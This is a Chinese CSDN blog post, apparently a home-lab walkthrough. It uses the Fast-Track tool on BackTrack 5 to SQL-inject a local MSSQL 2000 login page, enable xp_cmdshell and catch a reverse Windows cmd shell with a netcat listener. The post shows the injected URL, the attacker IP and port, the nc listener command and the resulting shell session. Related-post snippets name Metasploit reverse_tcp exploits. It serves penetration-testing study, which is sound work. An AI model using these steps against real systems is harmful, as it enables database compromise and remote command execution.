SQL Injector - GET Manual Setup Binary Payload Attack

最新推荐文章于 2022-05-23 22:37:56 发布
最新推荐文章于 2022-05-23 22:37:56 发布
阅读量1k 收藏
点赞数
分类专栏: Reverse Shell mssqlserver2000 backtrack netcat SQL Injection fasttrack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9275891
版权

bt5上操作:

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 4
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

    The manual portion allows you to customize your attack for whatever reason.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
    
    <ctrl>-c to exit to Main Menu...    

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
Enter the IP Address of server with NetCat Listening: 192.168.1.11
Enter Port number with NetCat listening: 9090


    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload....
    Sending second portion of payload....
    Sending next portion of payload...
    Sending the last portion of the payload...
    Running cleanup...
    Running the payload on the server...

另起一个bash运行nc获得了反向cmdshell: 

root@bt:~# nc -l -p 9090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-07-02  21:45    <DIR>          msf3
2012-08-07  03:10       176,204,554 msf3.zip
2004-12-29  13:07            61,440 nc.exe
2013-07-01  22:45    <DIR>          Program Files
2013-05-01  22:15        16,232,448 python-2.7.4.msi
2013-07-06  17:57    <DIR>          Python27
2013-04-07  21:03        70,402,968 SQL2000SP4.exe
2013-06-30  21:58    <DIR>          SQL2KSP4
2013-06-30  21:53    <DIR>          SQLEVAL
2011-03-22  17:38       349,280,992 sqleval.exe
2013-07-01  20:52    <DIR>          WINDOWS
2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe
               8 个文件    633,051,106 字节
               7 个目录  3,908,493,312 可用字节

C:\>exit
exit
root@bt:~#


feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mybatis-plus使用SqlInjector注入SQl
LinShiyang2018的博客
02-02 4809
Mybatis-plus使用SqlInjector注入SQl 1.通过ISqlInjector接口找到AbstractSqlInjector抽象实现类,再找到DefaultSqlInjector类,它是mybatis-plus的SQL 默认注入器,如果项目使用的是逻辑删除,那么可能配置的是另外一个LogicSqlInjector,我们项目使用的是LogicSqlInjector。 2.发现里面有一个List getMethodList()方法,返回一个集合,集合里面的每一个AbstractMethod就是对
ABC JS-CSS Injector-2.1
最新发布
12-15
名称:ABC JS-CSS Injector -------------------- 版本:2.1 作者:abcelearning 分类:其他 -------------------- 概述:脚本和样式注入的最佳且更快的解决方案。 描述: 脚本和样式注入的最佳且更快的解决方案。 ...
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
天元喜羊羊的博客
07-08 1113
fasttrack操作: root@bt:~# cd /pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks...
(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)
天元喜羊羊的博客
07-08 1087
在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为: METASPLOIT_PATH=/opt/metasploit/app/ 否则会找不到msfcli。 然后进入fasttrack进行操作: root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
MSSQL2K - SQL Injector - Query String Parameter Attack
天元喜羊羊的博客
07-01 1064
操作如下: root@root:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks... ******* ************************************
SQL Injector - POST Parameter Attack
天元喜羊羊的博客
07-08 1326
login.jsp如下: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> Register user username: password: bt5上操作如下: root@bt:/pentest/exploits/fasttrack
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
天元喜羊羊的博客
07-07 1572
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。 原来的博客链接:http://blog.csdn.net/feier7501/article/details/9220495 import socket HOST = '' PORT = 4444 s = socket.socket(socket.AF_INET, socket
MyBatis-plus执行自定义SQL
lydms的博客
05-23 7500
还有另外24篇MySQL+MyBatis+MyBatis-plus相关文章。
payload sql注入_Web安全:SQL注入工具
weixin_39609423的博客
12-20 308
SQL注入工具主要是针对Web服务器后台数据库的注入,其主要目的是获取数据库中的数据。以前常用的SQL注入工具有啊D注入工具及Domain(明小子注入工具),现在常用的SQL注入工具有HackBar、SQLMap、Pangolin、Havij、Safe3 SQL injector及超级SQL注入工具等。1、HackBarHackBar是专门用来进行手动安全测试的浏览器插件(例如手动测试S...
手工盲注辅助注入工具Blind-SQL-Injector.zip
07-18
手工盲注辅助注入工具Blind-SQL-Injector.zip
Injector-linux-开源
05-03
Injector是一个软盘Linux系统,它支持多种文件系统。 目前,这是23个,具有所有必需的磁盘标签和最大的写入支持。 此功能使其非常适合任何类型的磁盘/文件救援操作或操纵
injector-php-7:PHP 7.4的递归依赖注入器
04-08
怎么运行的除其他外,注入器根据类构造函数签名中指定的参数类型提示来递归实例化类依赖关系。 这需要使用反射。 您可能听说过“反射很慢”。 让我们弄清楚一些事情:如果做错了,任何事情都会变得“缓慢”。...
good-injector-vue:Vue.js的适配器,可与良好注入器集成
05-13
良好的喷射力 Vue.js的适配器,用于与typeScript的依赖项注入框架集成。 特征 集成为Vue.js插件 支持对Vue.js组件的所有生命... import { Container , GoodInjectorPlugin } from "good-injector-vue" ; // setup depen
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
metasploit运行run vnc
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8035
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
metasploit文件格式漏洞渗透攻击(成功获得shell)
天元喜羊羊的博客
05-14 7137
环境BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t
-lmali_hook -lmali_hook_injector -lmali -ldrm -lwayland-client -lwayland-server -lpthread -lrt -lpthread -ldl ' Makefile:902: recipe for target 'ZZBClient' failed make: *** [ZZBClient] Error 1
05-27
gcc -o ZZBClient ZZBClient.c -L/path/to/libraries -lmali_hook -lmali_hook_injector -lmali -ldrm -lwayland-client -lwayland-server -lpthread -lrt -ldl ``` 其中`/path/to/libraries`是你库文件所在的路径...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值